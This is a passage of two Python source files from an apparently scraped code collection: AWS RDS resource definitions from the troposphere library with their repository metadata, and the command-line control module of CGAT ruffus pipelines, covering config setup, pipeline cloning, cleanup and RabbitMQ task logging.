days = ("Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun")
day_re = r'[A-Z]{1}[a-z]{2}'
hour = r'[01]?[0-9]|2[0-3]'
minute = r'[0-5][0-9]'
r = ("(?P<start_day>%s):(?P<start_hour>%s):(?P<start_minute>%s)-"
"(?P<end_day>%s):(?P<end_hour>%s):(?P<end_minute>%s)") % (day_re,
hour,
minute,
day_re,
hour,
minute)
range_regex = re.compile(r)
m = range_regex.match(window)
if not m:
raise ValueError("DBInstance PreferredMaintenanceWindow must be in "
"the format: ddd:hh24:mi-ddd:hh24:mi")
if m.group('start_day') not in days or m.group('end_day') not in days:
raise ValueError("DBInstance PreferredMaintenanceWindow day part of "
"ranges must be one of: %s" % ", ".join(days))
start_ts = (days.index(m.group('start_day')) * 24 * 60) + \
(int(m.group('start_hour')) * 60) + int(m.group('start_minute'))
end_ts = (days.index(m.group('end_day')) * 24 * 60) + \
(int(m.group('end_hour')) * 60) + int(m.group('end_minute'))
if abs(end_ts - start_ts) < 30:
raise ValueError("DBInstance PreferredMaintenanceWindow must be at "
"least 30 minutes long.")
return window
def validate_backup_retention_period(days):
"""Validate BackupRetentionPeriod for DBInstance"""
days = positive_integer(days)
if int(days) > 35:
raise ValueError("DBInstance BackupRetentionPeriod cannot be larger "
"than 35 days.")
return days
class DBInstance(AWSObject):
resource_type = "AWS::RDS::DBInstance"
props = {
'AllocatedStorage': (positive_integer, True),
'AllowMajorVersionUpgrade': (boolean, False),
'AutoMinorVersionUpgrade': (boolean, False),
'AvailabilityZone': (basestring, False),
'BackupRetentionPeriod': (validate_backup_retention_period, False),
'CharacterSetName': (basestring, False),
'DBInstanceClass': (basestring, True),
'DBInstanceIdentifier': (basestring, False),
'DBName': (basestring, False),
'DBParameterGroupName': (basestring, False),
'DBSecurityGroups': (list, False),
'DBSnapshotIdentifier': (basestring, False),
'DBSubnetGroupName': (basestring, False),
'Engine': (validate_engine, True),
'EngineVersion': (basestring, False),
'Iops': (validate_iops, False),
'KmsKeyId': (basestring, False),
'LicenseModel': (validate_license_model, False),
'MasterUsername': (basestring, False),
'MasterUserPassword': (basestring, False),
'MultiAZ': (boolean, False),
'OptionGroupName': (basestring, False),
'Port': (network_port, False),
'PreferredBackupWindow': (validate_backup_window, False),
'PreferredMaintenanceWindow': (basestring, False),
'PubliclyAccessible': (boolean, False),
'SourceDBInstanceIdentifier': (basestring, False),
'StorageEncrypted': (boolean, False),
'StorageType': (basestring, False),
'Tags': (list, False),
'VPCSecurityGroups': ([basestring, AWSHelperFn], False),
}
def validate(self):
if 'SourceDBInstanceIdentifier' in self.properties:
invalid_replica_properties = (
'BackupRetentionPeriod', 'DBName', 'MasterUsername',
'MasterUserPassword', 'PreferredBackupWindow', 'MultiAZ',
'DBSnapshotIdentifier', 'DBSubnetGroupName',
)
invalid_properties = [s for s in self.properties.keys() if
s in invalid_replica_properties]
if invalid_properties:
raise ValueError(
('{0} properties can\'t be provided when '
'SourceDBInstanceIdentifier is present '
'AWS::RDS::DBInstance.'
).format(', '.join(sorted(invalid_properties))))
if ('DBSnapshotIdentifier' not in self.properties and
'SourceDBInstanceIdentifier' not in self.properties) and \
('MasterUsername' not in self.properties or
'MasterUserPassword' not in self.properties):
raise ValueError(
'Either (MasterUsername and MasterUserPassword) or'
' DBSnapshotIdentifier are required in type '
'AWS::RDS::DBInstance.'
)
if 'KmsKeyId' in self.properties and \
'StorageEncrypted' not in self.properties:
raise ValueError(
'If KmsKeyId is provided, StorageEncrypted is required '
'AWS::RDS::DBInstance.'
)
nonetype = type(None)
avail_zone = self.properties.get('AvailabilityZone', None)
multi_az = self.properties.get('MultiAZ', None)
if not (isinstance(avail_zone, (AWSHelperFn, nonetype)) and
isinstance(multi_az, (AWSHelperFn, nonetype))):
if 'AvailabilityZone' in self.properties and \
self.properties.get('MultiAZ', None):
raise ValueError("AvailabiltyZone cannot be set on "
"DBInstance if MultiAZ is set to true.")
storage_type = self.properties.get('StorageType', None)
if storage_type and storage_type == 'io1' and \
'Iops' not in self.properties:
raise ValueError("Must specify Iops if using StorageType io1")
allocated_storage = self.properties.get('AllocatedStorage')
iops = self.properties.get('Iops', None)
if iops:
if not isinstance(allocated_storage, AWSHelperFn) and \
allocated_storage < 100:
raise ValueError("AllocatedStorage must be at least 100 when "
"Iops is set.")
if not isinstance(allocated_storage, AWSHelperFn) and not \
isinstance(iops, AWSHelperFn) and \
float(iops) / float(allocated_storage) > 10.0:
raise ValueError("AllocatedStorage must be no less than "
"1/10th the provisioned Iops")
return True
class DBParameterGroup(AWSObject):
resource_type = "AWS::RDS::DBParameterGroup"
props = {
'Description': (basestring, False),
'Family': (basestring, False),
'Parameters': (dict, False),
'Tags': (list, False),
}
class DBSubnetGroup(AWSObject):
resource_type = "AWS::RDS::DBSubnetGroup"
props = {
'DBSubnetGroupDescription': (basestring, True),
'SubnetIds': (list, True),
'Tags': (list, False),
}
class RDSSecurityGroup(AWSProperty):
props = {
'CIDRIP': (basestring, False),
'EC2SecurityGroupId': (basestring, False),
'EC2SecurityGroupName': (basestring, False),
'EC2SecurityGroupOwnerId': (basestring, False),
}
class DBSecurityGroup(AWSObject):
resource_type = "AWS::RDS::DBSecurityGroup"
props = {
'EC2VpcId': (basestring, False),
'DBSecurityGroupIngress': (list, True),
'GroupDescription': (basestring, True),
'Tags': (list, False),
}
class DBSecurityGroupIngress(AWSObject):
resource_type = "AWS::RDS::DBSecurityGroupIngress"
props = {
'CIDRIP': (basestring, False),
'DBSecurityGroupName': (basestring, True),
'EC2SecurityGroupId': (basestring, False),
'EC2SecurityGroupName': (basestring, False),
'EC2SecurityGroupOwnerId': (basestring, False),
}
class EventSubscription(AWSObject):
resource_type = "AWS::RDS::EventSubscription"
props = {
'Enabled': (boolean, False),
'EventCategories': ([basestring], False),
'SnsTopicArn': (basestring, True),
'SourceIds': ([basestring, Ref], False),
'SourceType': (basestring, False),
}
class OptionSetting(AWSProperty):
props = {
'Name': (basestring, False),
'Value': (basestring, False),
}
class OptionConfiguration(AWSProperty):
props = {
'DBSecurityGroupMemberships': ([basestring, Ref], False),
'OptionName': (basestring, True),
'OptionSettings': ([OptionSetting], False),
'Port': (network_port, False),
'VpcSecurityGroupMemberships': ([basestring, Ref], False),
}
class OptionGroup(AWSObject):
resource_type = "AWS::RDS::OptionGroup"
props = {
'EngineName': (basestring, True),
'MajorEngineVersion': (basestring, True),
'OptionGroupDescription': (basestring, True),
'OptionConfigurations': ([OptionConfiguration], True),
'Tags': (list, False),
}
| {
"content_hash": "b61e2fc0f4fdbfd8baa142328f2ed400",
"timestamp": "",
"source": "github",
"line_count": 312,
"max_line_length": 84,
"avg_line_length": 37.60576923076923,
"alnum_prop": 0.5804142163129634,
"repo_name": "ptoraskar/troposphere",
"id": "02994916ce136d36dad102033d468b11d4946026",
"size": "11844",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "troposphere/rds.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "174129"
}
],
"symlink_target": ""
} |
"""Control.py - Command line control for ruffus pipelines
=========================================================
The functions :func:`writeConfigFiles`, :func:`clean`,
:func:`clonePipeline` and :func:`peekParameters` provide the
functionality for particular pipeline commands.
:class:`MultiLineFormatter` improves the formatting
of long log messages, while
:class:`LoggingFilterRabbitMQ` intercepts ruffus log
messages and sends event information to a rabbitMQ message exchange
for task process monitoring.
Reference
---------
"""
import inspect
import json
import logging
import os
import re
import shutil
import subprocess
import sys
import tempfile
import time
import io
import glob
import fnmatch
from multiprocessing.pool import ThreadPool
# talking to RabbitMQ
try:
import pika
HAS_PIKA = True
except ImportError:
HAS_PIKA = False
# talking to a cluster
try:
import drmaa
HAS_DRMAA = True
except RuntimeError:
HAS_DRMAA = False
from ruffus import pipeline_printout_graph, pipeline_printout, \
pipeline_run, ruffus_exceptions, task
import CGAT.Experiment as E
import CGAT.IOTools as IOTools
from CGAT import Requirements as Requirements
from CGATPipelines.Pipeline.Utils import isTest, getCaller, getCallerLocals
from CGATPipelines.Pipeline.Execution import execute, startSession,\
closeSession
from CGATPipelines.Pipeline.Local import getProjectName, getPipelineName
from CGATPipelines.Pipeline.Parameters import inputValidation
# Set from Pipeline.py
PARAMS = {}
# global options and arguments - set but currently not
# used as relevant sections are entered into the PARAMS
# dictionary. Could be deprecated and removed.
GLOBAL_OPTIONS, GLOBAL_ARGS = None, None
def writeConfigFiles(pipeline_path, pipeline_path_2, general_path):
'''create default configuration files in `path`.
'''
# TO DO: I've modified this function with workarounds to make it more
# flexible in order to find an ini file, find a configuration dir and
# copy pre-run sphinx-quickstart files if they exist.
# Other than creating a 'report' dir, it should not change the way it is
# run from CGATPipelines.
# See also bottom of script for changes when calling the 'config' option
# Antonio
paths = [pipeline_path, pipeline_path_2, general_path]
report_dir = 'pipeline_report'
os.mkdir(report_dir) # Sphinx config files will be copied here
# CGATReport only needs its conf.py to generate the rest
# though
# Look for ini file:
f_count = 0
for path in paths:
if os.path.exists(path):
for f in os.listdir(os.path.abspath(path)):
if fnmatch.fnmatch(f, 'pipeline*ini'):
f_count += 1
INI_file = f
if f_count == 1:
config_files = [INI_file] # This is for the pipeline only
else:
raise ValueError('''You have no project configuration (".ini") file
or more than one in the directories:
{}
{}
or
{}'''.format(pipeline_path, pipeline_path_2, general_path)
)
# Copy pipeline ini file:
for dest in config_files:
if os.path.exists(dest):
E.warn("file `%s` already exists - skipped" % dest)
continue
for path in paths:
src = os.path.join(path, dest)
if os.path.exists(src):
shutil.copyfile(src, dest)
E.info("created new configuration file `%s` " % dest)
break
else:
raise ValueError('''default config file for `%s`
not found in
%s
A pipeline cannot be run without this.
''' % (config_files, paths))
# Copy Sphinx configuration files, enforce copy of 'conf.py' in case
# CGATReport is used:
dest = 'conf.py'
if os.path.exists(dest):
E.warn("file `%s` already exists - skipped" % dest)
for path in paths:
src = os.path.join(path, dest)
if os.path.exists(src):
# Put sphinx files in separate dir:
shutil.copyfile(src, os.path.join(report_dir, dest))
# Create a softlink outside of report_dir dir for CGATReport:
os.symlink(os.path.join(report_dir, dest), str(dest))
E.info("created new configuration file `%s` " % dest)
break
else:
# Only warn as pipeline can be run without report:
E.warn('''default config file for `%s` not found in
%s
CGATReport nor Sphinx can be run without this''' % (dest, paths))
# If other Sphinx config files are found, copy them if there is a skeleton
# pipeline report to use:
E.info('Looking for additional Sphinx configuration files.')
sphinx_config_files = ['Makefile',
'make.bat',
'include_links.rst',
'index.rst',
] # These are for a sphinx setup, not needed
# with CGATReport
# A 'report_pipeline_*.rst' template is
# searched for below
# Look for a pipeline report file:
f_count = 0
for path in paths:
if os.path.exists(path):
for f in os.listdir(os.path.abspath(path)):
# TO DO:
# This pattern matching is particular to
# https://github.com/AntonioJBT/project_quickstart
# Needs to be made more generic
if fnmatch.fnmatch(f, 'report_pipeline_*.rst'):
f_count += 1
pipeline_report_file = f
if f_count == 1:
sphinx_config_files.append(pipeline_report_file)
else:
# Only warn as pipeline can be run without report:
E.warn('''There is no pipeline report file matching
report_pipeline_*.rst
in the directories:
{}
{}
or
{}
Ignore this if you are using CGATReport.
'''.format(pipeline_path, pipeline_path_2, general_path)
)
# Copy the files across if they are found:
for dest in sphinx_config_files:
if os.path.exists(dest):
E.warn("file `%s` already exists - skipped" % dest)
continue
for path in paths:
src = os.path.join(path, dest)
if os.path.exists(src):
# Put sphinx files in separate dir:
shutil.copyfile(src, os.path.join(report_dir, dest))
E.info("created new configuration file `%s` " % dest)
break
else:
E.warn('''No sphinx-quickstart skeleton files such as:
{}
were found
in
{}
Continuing without.'''.format(dest, paths))
def printConfigFiles():
'''
Print the list of .ini files used to configure the pipeline
along with their associated priorities.
Priority 1 is the highest.
'''
filenames = PARAMS['pipeline_ini']
print ("\n List of .ini files used to configure the pipeline")
s = len(filenames)
if s == 0:
print (" No ini files passed!")
elif s >= 1:
print (" %-11s: %s " % ("Priority", "File"))
for f in filenames:
if s == 1:
print (" (highest) %s: %s\n" % (s, f))
else:
print (" %-11s: %s " % (s, f))
s -= 1
def clonePipeline(srcdir, destdir=None):
'''clone a pipeline.
Cloning entails creating a mirror of the source pipeline.
Generally, data files are mirrored by linking. Configuration
files and the pipeline database will be copied.
Without modification of any files, building the cloned pipeline in
`destdir` should not re-run any commands. However, on deleting
selected files, the pipeline should run from the appropriate
point. Newly created files will not affect the original pipeline.
Cloning pipelines permits sharing partial results between
pipelines, for example for parameter optimization.
Arguments
---------
scrdir : string
Source directory
destdir : string
Destination directory. If None, use the current directory.
'''
if destdir is None:
destdir = os.path.curdir
E.info("cloning pipeline from %s to %s" % (srcdir, destdir))
copy_files = ("conf.py", "pipeline.ini", "csvdb")
ignore_prefix = (
"report", "_cache", "export", "tmp", "ctmp",
"_static", "_templates")
def _ignore(p):
for x in ignore_prefix:
if p.startswith(x):
return True
return False
for root, dirs, files in os.walk(srcdir):
relpath = os.path.relpath(root, srcdir)
if _ignore(relpath):
continue
for d in dirs:
if _ignore(d):
continue
dest = os.path.join(os.path.join(destdir, relpath, d))
os.mkdir(dest)
# touch
s = os.stat(os.path.join(root, d))
os.utime(dest, (s.st_atime, s.st_mtime))
for f in files:
if _ignore(f):
continue
fn = os.path.join(root, f)
dest_fn = os.path.join(destdir, relpath, f)
if f in copy_files:
shutil.copyfile(fn, dest_fn)
else:
# realpath resolves links - thus links will be linked to
# the original target
os.symlink(os.path.realpath(fn),
dest_fn)
def clean(files, logfile):
'''clean up files given by glob expressions.
Files are cleaned up by zapping, i.e. the files are set to size
0. Links to files are replaced with place-holders.
Information about the original file is written to `logfile`.
Arguments
---------
files : list
List of glob expressions of files to clean up.
logfile : string
Filename of logfile.
'''
fields = ('st_atime', 'st_blksize', 'st_blocks',
'st_ctime', 'st_dev', 'st_gid', 'st_ino',
'st_mode', 'st_mtime', 'st_nlink',
'st_rdev', 'st_size', 'st_uid')
dry_run = PARAMS.get("dryrun", False)
if not dry_run:
if not os.path.exists(logfile):
outfile = IOTools.openFile(logfile, "w")
outfile.write("filename\tzapped\tlinkdest\t%s\n" %
"\t".join(fields))
else:
outfile = IOTools.openFile(logfile, "a")
c = E.Counter()
for fn in files:
c.files += 1
if not dry_run:
stat, linkdest = IOTools.zapFile(fn)
if stat is not None:
c.zapped += 1
if linkdest is not None:
c.links += 1
outfile.write("%s\t%s\t%s\t%s\n" % (
fn,
time.asctime(time.localtime(time.time())),
linkdest,
"\t".join([str(getattr(stat, x)) for x in fields])))
E.info("zapped: %s" % (c))
outfile.close()
return c
def peekParameters(workingdir,
pipeline,
on_error_raise=None,
prefix=None,
update_interface=False,
restrict_interface=False):
'''peek configuration parameters from external pipeline.
As the paramater dictionary is built at runtime, this method
executes the pipeline in workingdir, dumping its configuration
values and reading them into a dictionary.
If either `pipeline` or `workingdir` are not found, an error is
raised. This behaviour can be changed by setting `on_error_raise`
to False. In that case, an empty dictionary is returned.
Arguments
---------
workingdir : string
Working directory. This is the directory that the pipeline
was executed in.
pipeline : string
Name of the pipeline script. The pipeline is assumed to live
in the same directory as the current pipeline.
on_error_raise : Bool
If set to a boolean, an error will be raised (or not) if there
is an error during parameter peeking, for example if
`workingdir` can not be found. If `on_error_raise` is None, it
will be set to the default, which is to raise an exception
unless the calling script is imported or the option
``--is-test`` has been passed at the command line.
prefix : string
Add a prefix to all parameters. This is useful if the paramaters
are added to the configuration dictionary of the calling pipeline.
update_interface : bool
If True, this method will prefix any options in the
``[interface]`` section with `workingdir`. This allows
transparent access to files in the external pipeline.
restrict_interface : bool
If True, only interface parameters will be imported.
Returns
-------
config : dict
Dictionary of configuration values.
'''
caller_locals = getCallerLocals()
# check if we should raise errors
if on_error_raise is None:
on_error_raise = not isTest() and \
"__name__" in caller_locals and \
caller_locals["__name__"] == "__main__"
# patch - if --help or -h in command line arguments,
# do not peek as there might be no config file.
if "--help" in sys.argv or "-h" in sys.argv:
return {}
# Attempt to locate directory with pipeline source code. This is a
# patch as pipelines might be called within the repository
# directory or from an installed location
dirname = PARAMS["pipelinedir"]
# called without a directory, use current directory
if dirname == "":
dirname = os.path.abspath(".")
else:
# if not exists, assume we want version located
# in directory of calling script.
if not os.path.exists(dirname):
# directory is path of calling script
dirname = os.path.dirname(caller_locals['__file__'])
pipeline = os.path.join(dirname, pipeline)
if not os.path.exists(pipeline):
if on_error_raise:
raise ValueError(
"can't find pipeline at %s" % (pipeline))
else:
return {}
if workingdir == "":
workingdir = os.path.abspath(".")
# patch for the "config" target - use default
# pipeline directory if directory is not specified
# working dir is set to "?!"
if "config" in sys.argv or "check" in sys.argv or "clone" in sys.argv and workingdir == "?!":
workingdir = os.path.join(PARAMS.get("pipelinedir"),
IOTools.snip(pipeline, ".py"))
if not os.path.exists(workingdir):
if on_error_raise:
raise ValueError(
"can't find working dir %s" % workingdir)
else:
return {}
statement = "python %s -f -v 0 dump" % pipeline
process = subprocess.Popen(statement,
cwd=workingdir,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# process.stdin.close()
stdout, stderr = process.communicate()
if process.returncode != 0:
raise OSError(
("Child was terminated by signal %i: \n"
"Statement: %s\n"
"The stderr was: \n%s\n"
"Stdout: %s") %
(-process.returncode, statement, stderr, stdout))
# subprocess only accepts encoding argument in py >= 3.6 so
# decode here.
stdout = stdout.decode("utf-8").splitlines()
# remove any log messages
stdout = [x for x in stdout if x.startswith("{")]
if len(stdout) > 1:
raise ValueError("received multiple configurations")
dump = json.loads(stdout[0])
# update interface
if update_interface:
for key, value in list(dump.items()):
if key.startswith("interface"):
dump[key] = os.path.join(workingdir, value)
# keep only interface if so required
if restrict_interface:
dump = dict([(k, v) for k, v in dump.items()
if k.startswith("interface")])
# prefix all parameters
if prefix is not None:
dump = dict([("%s%s" % (prefix, x), y) for x, y in list(dump.items())])
return dump
class MultiLineFormatter(logging.Formatter):
"""add identation for multi-line entries.
"""
def format(self, record):
s = logging.Formatter.format(self, record)
if record.message:
header, footer = s.split(record.message)
s = s.replace('\n', '\n' + ' ' * len(header))
return s
class LoggingFilterRabbitMQ(logging.Filter):
"""pass event information to a rabbitMQ message queue.
This is a log filter which detects messages from ruffus_ and sends
them to a rabbitMQ message queue.
A :term:`task` is a ruffus_ decorated function, which will execute
one or more :term:`jobs`.
Valid task/job status:
update
task/job needs updating
completed
task/job completed successfully
failed
task/job failed
running
task/job is running
ignore
ignore task/job (is up-to-date)
Arguments
---------
ruffus_text : string
Log messages from ruffus.pipeline_printout. These are used
to collect all tasks that will be executed during pipeline
executation.
project_name : string
Name of the project
pipeline_name : string
Name of the pipeline
host : string
RabbitMQ host name
exchange : string
RabbitMQ exchange name
"""
def __init__(self, ruffus_text,
project_name,
pipeline_name,
host="localhost",
exchange="ruffus_pipelines"):
self.project_name = project_name
self.pipeline_name = pipeline_name
self.exchange = exchange
# dictionary of jobs to run
self.jobs = {}
self.tasks = {}
if not HAS_PIKA:
self.connected = False
return
def split_by_job(text):
text = "".join(text)
job_message = ""
# ignore first entry which is the docstring
for line in text.split(" Job = ")[1:]:
try:
# long file names cause additional wrapping and
# additional white-space characters
job_name = re.search(
"\[.*-> ([^\]]+)\]", line).groups()
except AttributeError:
raise AttributeError("could not parse '%s'" % line)
job_status = "ignore"
if "Job needs update" in line:
job_status = "update"
yield job_name, job_status, job_message
def split_by_task(text):
block, task_name = [], None
task_status = None
for line in text.split("\n"):
line = line.strip()
if line.startswith("Tasks which will be run"):
task_status = "update"
elif line.startswith("Tasks which are up-to-date"):
task_status = "ignore"
if line.startswith("Task = "):
if task_name:
yield task_name, task_status, list(split_by_job(block))
block = []
task_name = re.match("Task = (.*)", line).groups()[0]
continue
if line:
block.append(line)
if task_name:
yield task_name, task_status, list(split_by_job(block))
# create connection
try:
connection = pika.BlockingConnection(pika.ConnectionParameters(
host=host))
self.connected = True
except pika.exceptions.AMQPConnectionError:
self.connected = False
return
self.channel = connection.channel()
self.channel.exchange_declare(
exchange=self.exchange,
type='topic')
# populate with initial messages
for task_name, task_status, jobs in split_by_task(ruffus_text):
if task_name.startswith("(mkdir"):
continue
to_run = 0
for job_name, job_status, job_message in jobs:
self.jobs[job_name] = (task_name, job_name)
if job_status == "update":
to_run += 1
self.tasks[task_name] = [task_status, len(jobs),
len(jobs) - to_run]
self.send_task(task_name)
def send_task(self, task_name):
'''send task status.'''
if not self.connected:
return
task_status, task_total, task_completed = self.tasks[task_name]
data = {}
data['created_at'] = time.time()
data['pipeline'] = self.pipeline_name
data['task_name'] = task_name
data['task_status'] = task_status
data['task_total'] = task_total
data['task_completed'] = task_completed
key = "%s.%s.%s" % (self.project_name, self.pipeline_name, task_name)
try:
self.channel.basic_publish(exchange=self.exchange,
routing_key=key,
body=json.dumps(data))
except pika.exceptions.ConnectionClosed:
E.warn("could not send message - connection closed")
except Exception as e:
E.warn("could not send message: %s" % str(e))
def send_error(self, task_name, job, error=None, msg=None):
if not self.connected:
return
try:
task_status, task_total, task_completed = self.tasks[task_name]
except KeyError:
E.warn("could not get task information for %s, no message sent" %
task_name)
return
data = {}
data['created_at'] = time.time()
data['pipeline'] = self.pipeline_name
data['task_name'] = task_name
data['task_status'] = 'failed'
data['task_total'] = task_total
data['task_completed'] = task_completed
key = "%s.%s.%s" % (self.project_name, self.pipeline_name, task_name)
try:
self.channel.basic_publish(exchange=self.exchange,
routing_key=key,
body=json.dumps(data))
except pika.exceptions.ConnectionClosed:
E.warn("could not send message - connection closed")
except Exception as e:
E.warn("could not send message: %s" % str(e))
def filter(self, record):
if not self.connected:
return True
# filter ruffus logging messages
if record.filename.endswith("task.py"):
try:
before, task_name = record.msg.strip().split(" = ")
except ValueError:
return True
# ignore the mkdir, etc tasks
if task_name not in self.tasks:
return True
if before == "Task enters queue":
self.tasks[task_name][0] = "running"
elif before == "Completed Task":
self.tasks[task_name][0] = "completed"
elif before == "Uptodate Task":
self.tasks[task_name][0] = "uptodate"
else:
return True
# send new task status out
self.send_task(task_name)
return True
USAGE = '''
usage: %prog [OPTIONS] [CMD] [target]
Execute pipeline %prog.
Commands can be any of the following
make <target>
run all tasks required to build *target*
show <target>
show tasks required to build *target* without executing them
plot <target>
plot image (using inkscape) of pipeline state for *target*
debug <target> [args]
debug a method using the supplied arguments. The method <target>
in the pipeline is run without checking any dependencies.
config
write new configuration files pipeline.ini, sphinxreport.ini and conf.py
with default values
dump
write pipeline configuration to stdout
printconfig
write pipeline configuration to stdout in a user-friendly way so
it is easier to debug pipeline parameters
touch
touch files only, do not run
regenerate
regenerate the ruffus checkpoint file
check
check if requirements (external tool dependencies) are satisfied.
clone <source>
create a clone of a pipeline in <source> in the current
directory. The cloning process aims to use soft linking to files
(not directories) as much as possible. Time stamps are
preserved. Cloning is useful if a pipeline needs to be re-run from
a certain point but the original pipeline should be preserved.
'''
def main(args=sys.argv):
"""command line control function for a pipeline.
This method defines command line options for the pipeline and
updates the global configuration dictionary correspondingly.
It then provides a command parser to execute particular tasks
using the ruffus pipeline control functions. See the generated
command line help for usage.
To use it, add::
import CGAT.Pipeline as P
if __name__ == "__main__":
sys.exit(P.main(sys.argv))
to your pipeline script.
Arguments
---------
args : list
List of command line arguments.
"""
global GLOBAL_OPTIONS
global GLOBAL_ARGS
parser = E.OptionParser(version="%prog version: $Id$",
usage=USAGE)
parser.add_option("--pipeline-action", dest="pipeline_action",
type="choice",
choices=(
"make", "show", "plot", "dump", "config", "clone",
"check", "regenerate", "printconfig"),
help="action to take [default=%default].")
parser.add_option("--pipeline-format", dest="pipeline_format",
type="choice",
choices=("dot", "jpg", "svg", "ps", "png"),
help="pipeline format [default=%default].")
parser.add_option("-n", "--dry-run", dest="dry_run",
action="store_true",
help="perform a dry run (do not execute any shell "
"commands) [default=%default].")
parser.add_option("-f", "--force-output", dest="force",
action="store_true",
help="force running the pipeline even if there "
"are uncommited changes "
"in the repository [default=%default].")
parser.add_option("-p", "--multiprocess", dest="multiprocess", type="int",
help="number of parallel processes to use on "
"submit host "
"(different from number of jobs to use for "
"cluster jobs) "
"[default=%default].")
parser.add_option("-e", "--exceptions", dest="log_exceptions",
action="store_true",
help="echo exceptions immediately as they occur "
"[default=%default].")
parser.add_option("-i", "--terminate", dest="terminate",
action="store_true",
help="terminate immediately at the first exception "
"[default=%default].")
parser.add_option("-d", "--debug", dest="debug",
action="store_true",
help="output debugging information on console, "
"and not the logfile "
"[default=%default].")
parser.add_option("-s", "--set", dest="variables_to_set",
type="string", action="append",
help="explicitly set paramater values "
"[default=%default].")
parser.add_option("-c", "--checksums", dest="ruffus_checksums_level",
type="int",
help="set the level of ruffus checksums"
"[default=%default].")
parser.add_option("-t", "--is-test", dest="is_test",
action="store_true",
help="this is a test run"
"[default=%default].")
parser.add_option("--rabbitmq-exchange", dest="rabbitmq_exchange",
type="string",
help="RabbitMQ exchange to send log messages to "
"[default=%default].")
parser.add_option("--rabbitmq-host", dest="rabbitmq_host",
type="string",
help="RabbitMQ host to send log messages to "
"[default=%default].")
parser.add_option("--input-validation", dest="input_validation",
action="store_true",
help="perform input validation before starting "
"[default=%default].")
parser.set_defaults(
pipeline_action=None,
pipeline_format="svg",
pipeline_targets=[],
multiprocess=40,
logfile="pipeline.log",
dry_run=False,
force=False,
log_exceptions=False,
exceptions_terminate_immediately=False,
debug=False,
variables_to_set=[],
is_test=False,
ruffus_checksums_level=0,
rabbitmq_host="saruman",
rabbitmq_exchange="ruffus_pipelines",
input_validation=False)
(options, args) = E.Start(parser,
add_cluster_options=True)
GLOBAL_OPTIONS, GLOBAL_ARGS = options, args
E.info("Started in: %s" % PARAMS.get("workingdir"))
# At this point, the PARAMS dictionary has already been
# built. It now needs to be updated with selected command
# line options as these should always take precedence over
# configuration files.
PARAMS["dryrun"] = options.dry_run
PARAMS["input_validation"] = options.input_validation
# use cli_cluster_* keys in PARAMS to ensure highest priority
# of cluster_* options passed with the command-line
if options.cluster_memory_default is not None:
PARAMS["cli_cluster_memory_default"] = options.cluster_memory_default
PARAMS["cluster_memory_default"] = options.cluster_memory_default
if options.cluster_memory_resource is not None:
PARAMS["cli_cluster_memory_resource"] = options.cluster_memory_resource
PARAMS["cluster_memory_resource"] = options.cluster_memory_resource
if options.cluster_num_jobs is not None:
PARAMS["cli_cluster_num_jobs"] = options.cluster_num_jobs
PARAMS["cluster_num_jobs"] = options.cluster_num_jobs
if options.cluster_options is not None:
PARAMS["cli_cluster_options"] = options.cluster_options
PARAMS["cluster_options"] = options.cluster_options
if options.cluster_parallel_environment is not None:
PARAMS["cli_cluster_parallel_environment"] = options.cluster_parallel_environment
PARAMS["cluster_parallel_environment"] = options.cluster_parallel_environment
if options.cluster_priority is not None:
PARAMS["cli_cluster_priority"] = options.cluster_priority
PARAMS["cluster_priority"] = options.cluster_priority
if options.cluster_queue is not None:
PARAMS["cli_cluster_queue"] = options.cluster_queue
PARAMS["cluster_queue"] = options.cluster_queue
if options.cluster_queue_manager is not None:
PARAMS["cli_cluster_queue_manager"] = options.cluster_queue_manager
PARAMS["cluster_queue_manager"] = options.cluster_queue_manager
PARAMS["ruffus_checksums_level"] = options.ruffus_checksums_level
for variables in options.variables_to_set:
variable, value = variables.split("=")
PARAMS[variable.strip()] = IOTools.str2val(value.strip())
if args:
options.pipeline_action = args[0]
if len(args) > 1:
options.pipeline_targets.extend(args[1:])
# see inputValidation function in Parameters.py
if options.input_validation:
inputValidation(PARAMS, sys.argv[0])
if options.pipeline_action == "check":
counter, requirements = Requirements.checkRequirementsFromAllModules()
for requirement in requirements:
E.info("\t".join(map(str, requirement)))
E.info("version check summary: %s" % str(counter))
E.Stop()
return
elif options.pipeline_action == "debug":
# create the session proxy
startSession()
method_name = options.pipeline_targets[0]
caller = getCaller()
method = getattr(caller, method_name)
method(*options.pipeline_targets[1:])
elif options.pipeline_action in ("make", "show", "svg", "plot",
"touch", "regenerate"):
# set up extra file logger
handler = logging.FileHandler(filename=options.logfile,
mode="a")
handler.setFormatter(
MultiLineFormatter(
'%(asctime)s %(levelname)s %(module)s.%(funcName)s.%(lineno)d %(message)s'))
logger = logging.getLogger()
logger.addHandler(handler)
messenger = None
try:
if options.pipeline_action == "make":
# get tasks to be done. This essentially replicates
# the state information within ruffus.
stream = io.StringIO()
pipeline_printout(
stream,
options.pipeline_targets,
verbose=5,
checksum_level=options.ruffus_checksums_level)
messenger = LoggingFilterRabbitMQ(
stream.getvalue(),
project_name=getProjectName(),
pipeline_name=getPipelineName(),
host=options.rabbitmq_host,
exchange=options.rabbitmq_exchange)
logger.addFilter(messenger)
if not options.without_cluster:
global task
# use threading instead of multiprocessing in order to
# limit the number of concurrent jobs by using the
# GIL
#
# Note that threading might cause problems with rpy.
task.Pool = ThreadPool
# create the session proxy
startSession()
#
# make sure we are not logging at the same time in
# different processes
#
# session_mutex = manager.Lock()
E.info(E.GetHeader())
E.info("code location: %s" % PARAMS["pipeline_scriptsdir"])
E.info("Working directory is: %s" % PARAMS["workingdir"])
pipeline_run(
options.pipeline_targets,
multiprocess=options.multiprocess,
logger=logger,
verbose=options.loglevel,
log_exceptions=options.log_exceptions,
exceptions_terminate_immediately=options.exceptions_terminate_immediately,
checksum_level=options.ruffus_checksums_level,
)
E.info(E.GetFooter())
closeSession()
elif options.pipeline_action == "show":
pipeline_printout(
options.stdout,
options.pipeline_targets,
verbose=options.loglevel,
checksum_level=options.ruffus_checksums_level)
elif options.pipeline_action == "touch":
pipeline_run(
options.pipeline_targets,
touch_files_only=True,
verbose=options.loglevel,
checksum_level=options.ruffus_checksums_level)
elif options.pipeline_action == "regenerate":
pipeline_run(
options.pipeline_targets,
touch_files_only=options.ruffus_checksums_level,
verbose=options.loglevel)
elif options.pipeline_action == "svg":
pipeline_printout_graph(
options.stdout.buffer,
options.pipeline_format,
